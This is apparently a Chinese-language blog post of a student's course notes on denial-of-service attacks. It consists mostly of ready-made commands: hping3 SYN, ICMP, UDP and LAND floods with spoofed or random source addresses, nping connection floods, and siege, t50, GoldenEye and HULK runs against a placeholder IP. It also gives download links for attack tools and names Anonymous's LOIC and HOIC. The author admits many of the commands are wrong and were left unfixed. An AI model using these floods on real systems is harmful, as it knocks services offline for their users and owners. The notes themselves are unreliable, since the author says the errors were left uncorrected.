其他拒絕服務攻擊攻防總結
哈哈哈雖然明兒考試但是!!!一天我不寫博客真滴睡不香! 而且DoS留下一個小尾巴心裏不舒服,今兒感覺複習差不多,就抽點時間把這個課聽完了,這裏的代碼很多錯,沒有改完,之後做實驗再回來改,留個小坑
Kali自帶拒絕服務攻擊工具
Hping3
幾乎可以定製發送任何TCP/IP數據包,用於測試FW、端口掃描、性能測試
Syn Flood 攻擊
-hping3 -c 1000 -d 120 -S -w 64 -p 80 - -flood - -rand-source 1.1.1.1
-hping3 -S -P -U -p 80 - -flood - -rand-source 1.1.1.1
-hping3 -SARFUP -p 80 - -flood - -rand-source 1.1.1.1 (TCP Flood)
ICMP Flood 攻擊
-hping3 -q -n -a 1.1.1.1 - -icmp -d 56 - -flood 1.1.1.2
補充兩個參數 --rand-source 用公網隨機地址進行攻擊
-a 1.1.1.1 僞造成1.1.1.1進行攻擊
詳細幫助文檔:http://cnhotfire.blog.51cto.com/2042323/698362/
UDP Flood 攻擊
-hping3 -a 1.1.1.1 - -udp -s 53 -d 100 -p 53 - -flood 1.1.1.2
LAND攻擊
特殊種類的SYN Flood攻擊
源地址、目的地址都是受害者,受害者於自己完成三次握手
—hping3 -n –a 1.1.1.1 -S -d 100 -p 80 –flood 1.1.1.1
LAND攻者是僞造的源地址和要攻擊目標地址是同一個地址,也就是說自己與自己建立連接。可用tcpdump –I eth0 –s 0 –vv查看
TCP全鏈接DoS攻擊
nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1
//--rate=100000 一次建10000個連接,-C是一共建1000000000連接。
查公網IP
-nping - -echo-client "public" echo.nmap.org - -udp
Siege
-http/https壓力測試工具,模擬多個用戶併發訪問請求 —siege
- siege -g http://1.1.1.1/a.php //掃描網站banner信息
- siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp -vv
同時攻擊多個url,使用-f調用字典文件 /etc/siege/urls.txt,也可以直接
編輯urls.txt把要攻擊的地址放進去直接使用siege –i –c 1000 -vv
就可以攻擊
Siege攻擊一般用作併發量、性能測試,多用戶併發訪問測試。開發上線一般都會經過這步。
siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp
//10000用戶併發, -A代表指紋信息,可隨便填定。
一般用golden eye代替,後面有
T50網絡壓力測試
- t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
Nmap
-grep dos /usr/share/nmap/scripts/script.db |cut -d “”" -f 2
其他拒絕服務攻擊
XOIC
攻擊任意IP地址的指定端口
git clone git://git.code.sf.net/p/xoic/code xoic-code
https://xoicdoser.wordpress.com/
三種模式:test、normal、DoS Attack
支持協議:TCP/HTTP/UDP/ICMP
DDOSIM
7層拒絕服務工具(模擬多個殭屍機)
隨機IP地址 一基於TCP連接的攻擊 -應用層DDoS攻擊
正常的HTTP請求、非正常的HTTP請求式DDoS -SMTP DDoS
隨機端口的TCP連接洪水
GoldenEye
http/https拒絕服務攻擊工具
安全研究爲目的Python腳本
隨機攻擊向量,keep-alive,避免緩存命中
-wget https://github.com/jseidl/GoldenEye/archive/master.zip
-unzip master.zip
-./goldeneye.py http://1.1.1.1 -w 50
goldeneye.py http://1.1.1.1 -w 50 –m random //-w 50 代表50個人 ,-s 500代表每個人500個,50*500打25000個鏈接。
HULK - Http Unbearable Load King
Python腳本
隨機產生大量唯一的地址請求,避免緩存命中 -耗盡WEB服務器資源池
https://packetstormsecurity.com/files/download/112856/hulk.zip
匿名者攻擊工具
匿名者發佈的一些DoS工具
LOIC
HOIC
DDoSer
他們招募志願者發放以上工具
以上DoS工具不隱藏真實IP地址
PS.我啥時候能有個黑客團體呢 哈哈